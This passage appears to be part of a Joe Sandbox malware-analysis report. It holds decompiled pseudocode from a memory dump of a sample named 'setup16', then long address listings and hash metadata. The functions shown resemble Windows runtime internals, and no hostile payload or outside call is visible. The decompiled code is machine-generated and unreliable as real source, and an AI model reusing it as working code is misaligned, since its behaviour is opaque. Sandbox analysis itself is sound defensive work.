					return E04A0B640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
				} else {
					_t299 = __edx[2];
					if( *_t299 == 0x5c) {
						_t256 =  *(_t299 + 2) & 0x0000ffff;
						if(_t256 != 0x5c) {
							if(_t256 != 0x3f) {
								goto L2;
							} else {
								goto L50;
							}
						} else {
							L50:
							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
								goto L2;
							} else {
								_t251 = E04A03D43(_t315, _t321, _t157, _v560, _v572, _t305);
								_pop(_t319);
								_pop(_t326);
								_pop(_t257);
								return E04A0B640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
							}
						}
					} else {
						L2:
						_t260 = _v572;
						goto L3;
					}
				}
				L101:
			}















































































                                                                                                                                                                                                        0x049e4128
                                                                                                                                                                                                        0x049e4135
                                                                                                                                                                                                        0x049e413c
                                                                                                                                                                                                        0x049e4141
                                                                                                                                                                                                        0x049e4145
                                                                                                                                                                                                        0x049e4147
                                                                                                                                                                                                        0x049e414e
                                                                                                                                                                                                        0x049e4151
                                                                                                                                                                                                        0x049e4159
                                                                                                                                                                                                        0x049e415c
                                                                                                                                                                                                        0x049e4160
                                                                                                                                                                                                        0x049e4164
                                                                                                                                                                                                        0x049e4168
                                                                                                                                                                                                        0x049e416c
                                                                                                                                                                                                        0x049e417f
                                                                                                                                                                                                        0x049e4181
                                                                                                                                                                                                        0x049e446a
                                                                                                                                                                                                        0x049e446a
                                                                                                                                                                                                        0x049e418c
                                                                                                                                                                                                        0x049e4195
                                                                                                                                                                                                        0x049e4199
                                                                                                                                                                                                        0x049e4432
                                                                                                                                                                                                        0x049e4439
                                                                                                                                                                                                        0x049e443d
                                                                                                                                                                                                        0x049e4442
                                                                                                                                                                                                        0x049e4447
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049e419f
                                                                                                                                                                                                        0x049e41a3
                                                                                                                                                                                                        0x049e41b1
                                                                                                                                                                                                        0x049e41b9
                                                                                                                                                                                                        0x049e41bd
                                                                                                                                                                                                        0x049e45db
                                                                                                                                                                                                        0x049e45db
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049e41c3
                                                                                                                                                                                                        0x049e41c3
                                                                                                                                                                                                        0x049e41ce
                                                                                                                                                                                                        0x049e41d4
                                                                                                                                                                                                        0x04a2e138
                                                                                                                                                                                                        0x04a2e13e
                                                                                                                                                                                                        0x04a2e169
                                                                                                                                                                                                        0x04a2e16d
                                                                                                                                                                                                        0x04a2e19e
                                                                                                                                                                                                        0x04a2e16f
                                                                                                                                                                                                        0x04a2e16f
                                                                                                                                                                                                        0x04a2e175
                                                                                                                                                                                                        0x04a2e179
                                                                                                                                                                                                        0x04a2e18f
                                                                                                                                                                                                        0x04a2e193
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a2e199
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a2e199
                                                                                                                                                                                                        0x04a2e193
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049e41da
                                                                                                                                                                                                        0x049e41da
                                                                                                                                                                                                        0x049e41df
                                                                                                                                                                                                        0x049e41e4
                                                                                                                                                                                                        0x049e41ec
                                                                                                                                                                                                        0x049e4203
                                                                                                                                                                                                        0x049e4207
                                                                                                                                                                                                        0x04a2e1fd
                                                                                                                                                                                                        0x049e4222
                                                                                                                                                                                                        0x049e4226
                                                                                                                                                                                                        0x04a2e1f3
                                                                                                                                                                                                        0x04a2e1f3
                                                                                                                                                                                                        0x049e422c
                                                                                                                                                                                                        0x049e422c
                                                                                                                                                                                                        0x049e4233
                                                                                                                                                                                                        0x04a2e1ed
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049e4239
                                                                                                                                                                                                        0x049e4239
                                                                                                                                                                                                        0x049e4239
                                                                                                                                                                                                        0x049e4239
                                                                                                                                                                                                        0x049e4233
                                                                                                                                                                                                        0x049e4226
                                                                                                                                                                                                        0x049e41ee
                                                                                                                                                                                                        0x049e41ee
                                                                                                                                                                                                        0x049e41f4
                                                                                                                                                                                                        0x049e4575
                                                                                                                                                                                                        0x04a2e1b1
                                                                                                                                                                                                        0x04a2e1b1
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049e457b
                                                                                                                                                                                                        0x049e457b
                                                                                                                                                                                                        0x049e4582
                                                                                                                                                                                                        0x04a2e1ab
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049e4588
                                                                                                                                                                                                        0x049e4588
                                                                                                                                                                                                        0x049e458c
                                                                                                                                                                                                        0x04a2e1c4
                                                                                                                                                                                                        0x04a2e1c4
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049e4592
                                                                                                                                                                                                        0x049e4592
                                                                                                                                                                                                        0x049e4599
                                                                                                                                                                                                        0x04a2e1be
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049e459f
                                                                                                                                                                                                        0x049e459f
                                                                                                                                                                                                        0x049e45a3
                                                                                                                                                                                                        0x04a2e1d7
                                                                                                                                                                                                        0x04a2e1e4
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049e45a9
                                                                                                                                                                                                        0x049e45a9
                                                                                                                                                                                                        0x049e45b0
                                                                                                                                                                                                        0x04a2e1d1
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049e45b6
                                                                                                                                                                                                        0x049e45b6
                                                                                                                                                                                                        0x049e45b6
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049e45b6
                                                                                                                                                                                                        0x049e45b0
                                                                                                                                                                                                        0x049e45a3
                                                                                                                                                                                                        0x049e4599
                                                                                                                                                                                                        0x049e458c
                                                                                                                                                                                                        0x049e4582
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049e41f4
                                                                                                                                                                                                        0x049e423e
                                                                                                                                                                                                        0x049e4241
                                                                                                                                                                                                        0x049e45c0
                                                                                                                                                                                                        0x049e45c4
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049e45ca
                                                                                                                                                                                                        0x049e45ca
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a2e207
                                                                                                                                                                                                        0x04a2e20f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049e45d1
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049e45ca
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049e4247
                                                                                                                                                                                                        0x049e4247
                                                                                                                                                                                                        0x049e4247
                                                                                                                                                                                                        0x049e4249
                                                                                                                                                                                                        0x049e4249
                                                                                                                                                                                                        0x049e4249
                                                                                                                                                                                                        0x049e4251
                                                                                                                                                                                                        0x049e4251
                                                                                                                                                                                                        0x049e4257
                                                                                                                                                                                                        0x049e425f
                                                                                                                                                                                                        0x049e426e
                                                                                                                                                                                                        0x049e4270
                                                                                                                                                                                                        0x049e427a
                                                                                                                                                                                                        0x04a2e219
                                                                                                                                                                                                        0x04a2e219
                                                                                                                                                                                                        0x049e4280
                                                                                                                                                                                                        0x049e4282
                                                                                                                                                                                                        0x049e4456
                                                                                                                                                                                                        0x049e45ea
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049e45f0
                                                                                                                                                                                                        0x04a2e223
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a2e223
                                                                                                                                                                                                        0x049e445c
                                                                                                                                                                                                        0x049e445c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049e445c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049e4288
                                                                                                                                                                                                        0x049e428c
                                                                                                                                                                                                        0x04a2e298
                                                                                                                                                                                                        0x049e4292
                                                                                                                                                                                                        0x049e4292
                                                                                                                                                                                                        0x049e429e
                                                                                                                                                                                                        0x049e42a3
                                                                                                                                                                                                        0x049e42a7
                                                                                                                                                                                                        0x049e42ac
                                                                                                                                                                                                        0x04a2e22d
                                                                                                                                                                                                        0x049e42b2
                                                                                                                                                                                                        0x049e42b2
                                                                                                                                                                                                        0x049e42b9
                                                                                                                                                                                                        0x049e42bc
                                                                                                                                                                                                        0x049e42c2
                                                                                                                                                                                                        0x049e42ca
                                                                                                                                                                                                        0x049e42cd
                                                                                                                                                                                                        0x049e42cd
                                                                                                                                                                                                        0x049e42d4
                                                                                                                                                                                                        0x049e433f
                                                                                                                                                                                                        0x049e433f
                                                                                                                                                                                                        0x049e42d6
                                                                                                                                                                                                        0x049e42d6
                                                                                                                                                                                                        0x049e42d9
                                                                                                                                                                                                        0x049e42dd
                                                                                                                                                                                                        0x049e42eb
                                                                                                                                                                                                        0x04a2e23a
                                                                                                                                                                                                        0x049e42f1
                                                                                                                                                                                                        0x049e4305
                                                                                                                                                                                                        0x049e430d
                                                                                                                                                                                                        0x049e4315
                                                                                                                                                                                                        0x049e4318
                                                                                                                                                                                                        0x049e431f
                                                                                                                                                                                                        0x049e4322
                                                                                                                                                                                                        0x049e432e
                                                                                                                                                                                                        0x049e433b
                                                                                                                                                                                                        0x049e433b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049e432e
                                                                                                                                                                                                        0x049e42eb
                                                                                                                                                                                                        0x049e434c
                                                                                                                                                                                                        0x049e434e
                                                                                                                                                                                                        0x049e4352
                                                                                                                                                                                                        0x049e4359
                                                                                                                                                                                                        0x049e435e
                                                                                                                                                                                                        0x049e4361
                                                                                                                                                                                                        0x049e436e
                                                                                                                                                                                                        0x049e438a
                                                                                                                                                                                                        0x049e438e
                                                                                                                                                                                                        0x049e4396
                                                                                                                                                                                                        0x049e439e
                                                                                                                                                                                                        0x049e43a1
                                                                                                                                                                                                        0x049e43ad
                                                                                                                                                                                                        0x049e43bb
                                                                                                                                                                                                        0x049e43bb
                                                                                                                                                                                                        0x049e43ad
                                                                                                                                                                                                        0x049e436e
                                                                                                                                                                                                        0x049e43bf
                                                                                                                                                                                                        0x049e43c5
                                                                                                                                                                                                        0x049e4463
                                                                                                                                                                                                        0x049e4463
                                                                                                                                                                                                        0x049e43ce
                                                                                                                                                                                                        0x049e43d5
                                                                                                                                                                                                        0x049e43d9
                                                                                                                                                                                                        0x049e43df
                                                                                                                                                                                                        0x049e4475
                                                                                                                                                                                                        0x049e4479
                                                                                                                                                                                                        0x049e4491
                                                                                                                                                                                                        0x049e4491
                                                                                                                                                                                                        0x049e4479
                                                                                                                                                                                                        0x049e43e5
                                                                                                                                                                                                        0x049e43eb
                                                                                                                                                                                                        0x049e43f4
                                                                                                                                                                                                        0x049e43f6
                                                                                                                                                                                                        0x049e43f9
                                                                                                                                                                                                        0x049e43fc
                                                                                                                                                                                                        0x049e43ff
                                                                                                                                                                                                        0x049e44e8
                                                                                                                                                                                                        0x049e44ed
                                                                                                                                                                                                        0x049e44f3
                                                                                                                                                                                                        0x04a2e247
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049e44f9
                                                                                                                                                                                                        0x049e4504
                                                                                                                                                                                                        0x049e4508
                                                                                                                                                                                                        0x049e450f
                                                                                                                                                                                                        0x04a2e269
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049e4515
                                                                                                                                                                                                        0x049e4519
                                                                                                                                                                                                        0x049e4531
                                                                                                                                                                                                        0x049e4534
                                                                                                                                                                                                        0x049e4537
                                                                                                                                                                                                        0x049e453e
                                                                                                                                                                                                        0x049e4541
                                                                                                                                                                                                        0x049e454a
                                                                                                                                                                                                        0x04a2e255
                                                                                                                                                                                                        0x04a2e255
                                                                                                                                                                                                        0x04a2e25b
                                                                                                                                                                                                        0x04a2e25e
                                                                                                                                                                                                        0x04a2e261
                                                                                                                                                                                                        0x04a2e261
                                                                                                                                                                                                        0x049e4555
                                                                                                                                                                                                        0x049e4559
                                                                                                                                                                                                        0x049e455d
                                                                                                                                                                                                        0x04a2e26d
                                                                                                                                                                                                        0x04a2e270
                                                                                                                                                                                                        0x04a2e274
                                                                                                                                                                                                        0x04a2e27a
                                                                                                                                                                                                        0x04a2e27d
                                                                                                                                                                                                        0x04a2e28e
                                                                                                                                                                                                        0x04a2e28e
                                                                                                                                                                                                        0x049e4563
                                                                                                                                                                                                        0x049e4563
                                                                                                                                                                                                        0x049e4569
                                                                                                                                                                                                        0x049e4569
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049e455d
                                                                                                                                                                                                        0x049e450f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049e44f3
                                                                                                                                                                                                        0x049e43ff
                                                                                                                                                                                                        0x049e4405
                                                                                                                                                                                                        0x049e4405
                                                                                                                                                                                                        0x049e4405
                                                                                                                                                                                                        0x049e42ac
                                                                                                                                                                                                        0x049e428c
                                                                                                                                                                                                        0x049e4282
                                                                                                                                                                                                        0x049e4407
                                                                                                                                                                                                        0x049e440d
                                                                                                                                                                                                        0x04a2e2af
                                                                                                                                                                                                        0x04a2e2af
                                                                                                                                                                                                        0x049e4413
                                                                                                                                                                                                        0x049e4413
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049e41d4
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049e41c3
                                                                                                                                                                                                        0x049e41bd
                                                                                                                                                                                                        0x049e4415
                                                                                                                                                                                                        0x049e4415
                                                                                                                                                                                                        0x049e4416
                                                                                                                                                                                                        0x049e4417
                                                                                                                                                                                                        0x049e4429
                                                                                                                                                                                                        0x049e416e
                                                                                                                                                                                                        0x049e416e
                                                                                                                                                                                                        0x049e4175
                                                                                                                                                                                                        0x049e4498
                                                                                                                                                                                                        0x049e449f
                                                                                                                                                                                                        0x04a2e12d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a2e133
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a2e133
                                                                                                                                                                                                        0x049e44a5
                                                                                                                                                                                                        0x049e44a5
                                                                                                                                                                                                        0x049e44aa
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049e44bb
                                                                                                                                                                                                        0x049e44ca
                                                                                                                                                                                                        0x049e44d6
                                                                                                                                                                                                        0x049e44d7
                                                                                                                                                                                                        0x049e44d8
                                                                                                                                                                                                        0x049e44e3
                                                                                                                                                                                                        0x049e44e3
                                                                                                                                                                                                        0x049e44aa
                                                                                                                                                                                                        0x049e417b
                                                                                                                                                                                                        0x049e417b
                                                                                                                                                                                                        0x049e417b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049e417b
                                                                                                                                                                                                        0x049e4175
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: f2961f654cbb79bc8652370031fdfc8690133a2b2a1417a19a4e1c3bf43b725c
                                                                                                                                                                                                        • Instruction ID: a9869271ea419e77d9048a23a3185f75ca0665faa0f14bdf9e524f503e127c53
                                                                                                                                                                                                        • Opcode Fuzzy Hash: f2961f654cbb79bc8652370031fdfc8690133a2b2a1417a19a4e1c3bf43b725c
                                                                                                                                                                                                        • Instruction Fuzzy Hash: A8F17E706083118BCB25CF5AC580A3AB7E6FF98718F15493EF486CB291E734E991DB52
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 049F20A0 Relevance: .4, Instructions: 420COMMONCrypto
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 92%
                                                                                                                                                                                                        			E049F20A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
				signed int _v16;
				signed int _v20;
				signed char _v24;
				intOrPtr _v28;
				signed int _v32;
				void* _v36;
				char _v48;
				signed int _v52;
				signed int _v56;
				unsigned int _v60;
				char _v64;
				unsigned int _v68;
				signed int _v72;
				char _v73;
				signed int _v74;
				char _v75;
				signed int _v76;
				void* _v81;
				void* _v82;
				void* _v89;
				void* _v92;
				void* _v97;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t128;
				void* _t129;
				signed int _t130;
				void* _t132;
				signed char _t133;
				intOrPtr _t135;
				signed int _t137;
				signed int _t140;
				signed int* _t144;
				signed int* _t145;
				intOrPtr _t146;
				signed int _t147;
				signed char* _t148;
				signed int _t149;
				signed int _t153;
				signed int _t169;
				signed int _t174;
				signed int _t180;
				void* _t197;
				void* _t198;
				signed int _t201;
				intOrPtr* _t202;
				intOrPtr* _t205;
				signed int _t210;
				signed int _t215;
				signed int _t218;
				signed char _t221;
				signed int _t226;
				char _t227;
				signed int _t228;
				void* _t229;
				unsigned int _t231;
				void* _t235;
				signed int _t240;
				signed int _t241;
				void* _t242;
				signed int _t246;
				signed int _t248;
				signed int _t252;
				signed int _t253;
				void* _t254;
				intOrPtr* _t256;
				intOrPtr _t257;
				unsigned int _t262;
				signed int _t265;
				void* _t267;
				signed int _t275;

				_t198 = __ebx;
				_t267 = (_t265 & 0xfffffff0) - 0x48;
				_v68 = __ecx;
				_v73 = 0;
				_t201 = __edx & 0x00002000;
				_t128 = __edx & 0xffffdfff;
				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
				_v72 = _t128;
				if((_t128 & 0x00000008) != 0) {
					__eflags = _t128 - 8;
					if(_t128 != 8) {
						L69:
						_t129 = 0xc000000d;
						goto L23;
					} else {
						_t130 = 0;
						_v72 = 0;
						_v75 = 1;
						L2:
						_v74 = 1;
						_t226 =  *0x4ab8714; // 0x0
						if(_t226 != 0) {
							__eflags = _t201;
							if(_t201 != 0) {
								L62:
								_v74 = 1;
								L63:
								_t130 = _t226 & 0xffffdfff;
								_v72 = _t130;
								goto L3;
							}
							_v74 = _t201;
							__eflags = _t226 & 0x00002000;
							if((_t226 & 0x00002000) == 0) {
								goto L63;
							}
							goto L62;
						}
						L3:
						_t227 = _v75;
						L4:
						_t240 = 0;
						_v56 = 0;
						_t252 = _t130 & 0x00000100;
						if(_t252 != 0 || _t227 != 0) {
							_t240 = _v68;
							_t132 = E049F2EB0(_t240);
							__eflags = _t132 - 2;
							if(_t132 != 2) {
								__eflags = _t132 - 1;
								if(_t132 == 1) {
									goto L25;
								}
								__eflags = _t132 - 6;
								if(_t132 == 6) {
									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
									if( *((short*)(_t240 + 4)) != 0x3f) {
										goto L40;
									}
									_t197 = E049F2EB0(_t240 + 8);
									__eflags = _t197 - 2;
									if(_t197 == 2) {
										goto L25;
									}
								}
								L40:
								_t133 = 1;
								L26:
								_t228 = _v75;
								_v56 = _t240;
								__eflags = _t133;
								if(_t133 != 0) {
									__eflags = _t228;
									if(_t228 == 0) {
										L43:
										__eflags = _v72;
										if(_v72 == 0) {
											goto L8;
										}
										goto L69;
									}
									_t133 = E049C58EC(_t240);
									_t221 =  *0x4ab5cac; // 0x16
									__eflags = _t221 & 0x00000040;
									if((_t221 & 0x00000040) != 0) {
										_t228 = 0;
										__eflags = _t252;
										if(_t252 != 0) {
											goto L43;
										}
										_t133 = _v72;
										goto L7;
									}
									goto L43;
								} else {
									_t133 = _v72;
									goto L6;
								}
							}
							L25:
							_t133 = _v73;
							goto L26;
						} else {
							L6:
							_t221 =  *0x4ab5cac; // 0x16
							L7:
							if(_t133 != 0) {
								__eflags = _t133 & 0x00001000;
								if((_t133 & 0x00001000) != 0) {
									_t133 = _t133 | 0x00000a00;
									__eflags = _t221 & 0x00000004;
									if((_t221 & 0x00000004) != 0) {
										_t133 = _t133 | 0x00000400;
									}
								}
								__eflags = _t228;
								if(_t228 != 0) {
									_t133 = _t133 | 0x00000100;
								}
								_t229 = E04A04A2C(0x4ab6e40, 0x4a04b30, _t133, _t240);
								__eflags = _t229;
								if(_t229 == 0) {
									_t202 = _a20;
									goto L100;
								} else {
									_t135 =  *((intOrPtr*)(_t229 + 0x38));
									L15:
									_t202 = _a20;
									 *_t202 = _t135;
									if(_t229 == 0) {
										L100:
										 *_a4 = 0;
										_t137 = _a8;
										__eflags = _t137;
										if(_t137 != 0) {
											 *_t137 = 0;
										}
										 *_t202 = 0;
										_t129 = 0xc0000017;
										goto L23;
									} else {
										_t242 = _a16;
										if(_t242 != 0) {
											_t254 = _t229;
											memcpy(_t242, _t254, 0xd << 2);
											_t267 = _t267 + 0xc;
											_t242 = _t254 + 0x1a;
										}
										_t205 = _a4;
										_t25 = _t229 + 0x48; // 0x48
										 *_t205 = _t25;
										_t140 = _a8;
										if(_t140 != 0) {
											__eflags =  *((char*)(_t267 + 0xa));
											if( *((char*)(_t267 + 0xa)) != 0) {
												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
											} else {
												 *_t140 = 0;
											}
										}
										_t256 = _a12;
										if(_t256 != 0) {
											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
										}
										_t257 =  *_t205;
										_v48 = 0;
										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
										_v56 = 0;
										_v52 = 0;
										_t144 =  *( *[fs:0x30] + 0x50);
										if(_t144 != 0) {
											__eflags =  *_t144;
											if( *_t144 == 0) {
												goto L20;
											}
											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
											goto L21;
										} else {
											L20:
											_t145 = 0x7ffe0384;
											L21:
											if( *_t145 != 0) {
												_t146 =  *[fs:0x30];
												__eflags =  *(_t146 + 0x240) & 0x00000004;
												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
													_t147 = E049E7D50();
													__eflags = _t147;
													if(_t147 == 0) {
														_t148 = 0x7ffe0385;
													} else {
														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
													}
													__eflags =  *_t148 & 0x00000020;
													if(( *_t148 & 0x00000020) != 0) {
														_t149 = _v72;
														__eflags = _t149;
														if(__eflags == 0) {
															_t149 = 0x49a5c80;
														}
														_push(_t149);
														_push( &_v48);
														 *((char*)(_t267 + 0xb)) = E049FF6E0(_t198, _t242, _t257, __eflags);
														_push(_t257);
														_push( &_v64);
														_t153 = E049FF6E0(_t198, _t242, _t257, __eflags);
														__eflags =  *((char*)(_t267 + 0xb));
														if( *((char*)(_t267 + 0xb)) != 0) {
															__eflags = _t153;
															if(_t153 != 0) {
																__eflags = 0;
																E04A47016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
																L049E2400(_t267 + 0x20);
															}
															L049E2400( &_v64);
														}
													}
												}
											}
											_t129 = 0;
											L23:
											return _t129;
										}
									}
								}
							}
							L8:
							_t275 = _t240;
							if(_t275 != 0) {
								_v73 = 0;
								_t253 = 0;
								__eflags = 0;
								L29:
								_push(0);
								_t241 = E049F2397(_t240);
								__eflags = _t241;
								if(_t241 == 0) {
									_t229 = 0;
									L14:
									_t135 = 0;
									goto L15;
								}
								__eflags =  *((char*)(_t267 + 0xb));
								 *(_t241 + 0x34) = 1;
								if( *((char*)(_t267 + 0xb)) != 0) {
									E049E2280(_t134, 0x4ab8608);
									__eflags =  *0x4ab6e48 - _t253; // 0xa96d90
									if(__eflags != 0) {
										L48:
										_t253 = 0;
										__eflags = 0;
										L49:
										E049DFFB0(_t198, _t241, 0x4ab8608);
										__eflags = _t253;
										if(_t253 != 0) {
											L049E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
										}
										goto L31;
									}
									 *0x4ab6e48 = _t241;
									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
									__eflags = _t253;
									if(_t253 != 0) {
										_t57 = _t253 + 0x34;
										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
										__eflags =  *_t57;
										if( *_t57 == 0) {
											goto L49;
										}
									}
									goto L48;
								}
								L31:
								_t229 = _t241;
								goto L14;
							}
							_v73 = 1;
							_v64 = _t240;
							asm("lock bts dword [esi], 0x0");
							if(_t275 < 0) {
								_t231 =  *0x4ab8608; // 0x0
								while(1) {
									_v60 = _t231;
									__eflags = _t231 & 0x00000001;
									if((_t231 & 0x00000001) != 0) {
										goto L76;
									}
									_t73 = _t231 + 1; // 0x1
									_t210 = _t73;
									asm("lock cmpxchg [edi], ecx");
									__eflags = _t231 - _t231;
									if(_t231 != _t231) {
										L92:
										_t133 = E049F6B90(_t210,  &_v64);
										_t262 =  *0x4ab8608; // 0x0
										L93:
										_t231 = _t262;
										continue;
									}
									_t240 = _v56;
									goto L10;
									L76:
									_t169 = E049FE180(_t133);
									__eflags = _t169;
									if(_t169 != 0) {
										_push(0xc000004b);
										_push(0xffffffff);
										E04A097C0();
										_t231 = _v68;
									}
									_v72 = 0;
									_v24 =  *( *[fs:0x18] + 0x24);
									_v16 = 3;
									_v28 = 0;
									__eflags = _t231 & 0x00000002;
									if((_t231 & 0x00000002) == 0) {
										_v32 =  &_v36;
										_t174 = _t231 >> 4;
										__eflags = 1 - _t174;
										_v20 = _t174;
										asm("sbb ecx, ecx");
										_t210 = 3 |  &_v36;
										__eflags = _t174;
										if(_t174 == 0) {
											_v20 = 0xfffffffe;
										}
									} else {
										_v32 = 0;
										_v20 = 0xffffffff;
										_v36 = _t231 & 0xfffffff0;
										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
										_v72 =  !(_t231 >> 2) & 0xffffff01;
									}
									asm("lock cmpxchg [edi], esi");
									_t262 = _t231;
									__eflags = _t262 - _t231;
									if(_t262 != _t231) {
										goto L92;
									} else {
										__eflags = _v72;
										if(_v72 != 0) {
											E04A0006A(0x4ab8608, _t210);
										}
										__eflags =  *0x7ffe036a - 1;
										if(__eflags <= 0) {
											L89:
											_t133 =  &_v16;
											asm("lock btr dword [eax], 0x1");
											if(__eflags >= 0) {
												goto L93;
											} else {
												goto L90;
											}
											do {
												L90:
												_push(0);
												_push(0x4ab8608);
												E04A0B180();
												_t133 = _v24;
												__eflags = _t133 & 0x00000004;
											} while ((_t133 & 0x00000004) == 0);
											goto L93;
										} else {
											_t218 =  *0x4ab6904; // 0x400
											__eflags = _t218;
											if(__eflags == 0) {
												goto L89;
											} else {
												goto L87;
											}
											while(1) {
												L87:
												__eflags = _v16 & 0x00000002;
												if(__eflags == 0) {
													goto L89;
												}
												asm("pause");
												_t218 = _t218 - 1;
												__eflags = _t218;
												if(__eflags != 0) {
													continue;
												}
												goto L89;
											}
											goto L89;
										}
									}
								}
							}
							L10:
							_t229 =  *0x4ab6e48; // 0xa96d90
							_v72 = _t229;
							if(_t229 == 0 ||  *((char*)(_t229 + 0x40)) == 0 &&  *((intOrPtr*)(_t229 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
								E049DFFB0(_t198, _t240, 0x4ab8608);
								_t253 = _v76;
								goto L29;
							} else {
								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
								asm("lock cmpxchg [esi], ecx");
								_t215 = 1;
								if(1 != 1) {
									while(1) {
										_t246 = _t215 & 0x00000006;
										_t180 = _t215;
										__eflags = _t246 - 2;
										_v56 = _t246;
										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
										asm("lock cmpxchg [edi], esi");
										_t248 = _v56;
										__eflags = _t180 - _t215;
										if(_t180 == _t215) {
											break;
										}
										_t215 = _t180;
									}
									__eflags = _t248 - 2;
									if(_t248 == 2) {
										__eflags = 0;
										E04A000C2(0x4ab8608, 0, _t235);
									}
									_t229 = _v72;
								}
								goto L14;
							}
						}
					}
				}
				_t227 = 0;
				_v75 = 0;
				if(_t128 != 0) {
					goto L4;
				}
				goto L2;
			}











































































                                                                                                                                                                                                        0x049f20a0
                                                                                                                                                                                                        0x049f20a8
                                                                                                                                                                                                        0x049f20ad
                                                                                                                                                                                                        0x049f20b3
                                                                                                                                                                                                        0x049f20b8
                                                                                                                                                                                                        0x049f20c2
                                                                                                                                                                                                        0x049f20c7
                                                                                                                                                                                                        0x049f20cb
                                                                                                                                                                                                        0x049f20d2
                                                                                                                                                                                                        0x049f2263
                                                                                                                                                                                                        0x049f2266
                                                                                                                                                                                                        0x04a35836
                                                                                                                                                                                                        0x04a35836
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049f226c
                                                                                                                                                                                                        0x049f226c
                                                                                                                                                                                                        0x049f2270
                                                                                                                                                                                                        0x049f2274
                                                                                                                                                                                                        0x049f20e2
                                                                                                                                                                                                        0x049f20e2
                                                                                                                                                                                                        0x049f20e6
                                                                                                                                                                                                        0x049f20ee
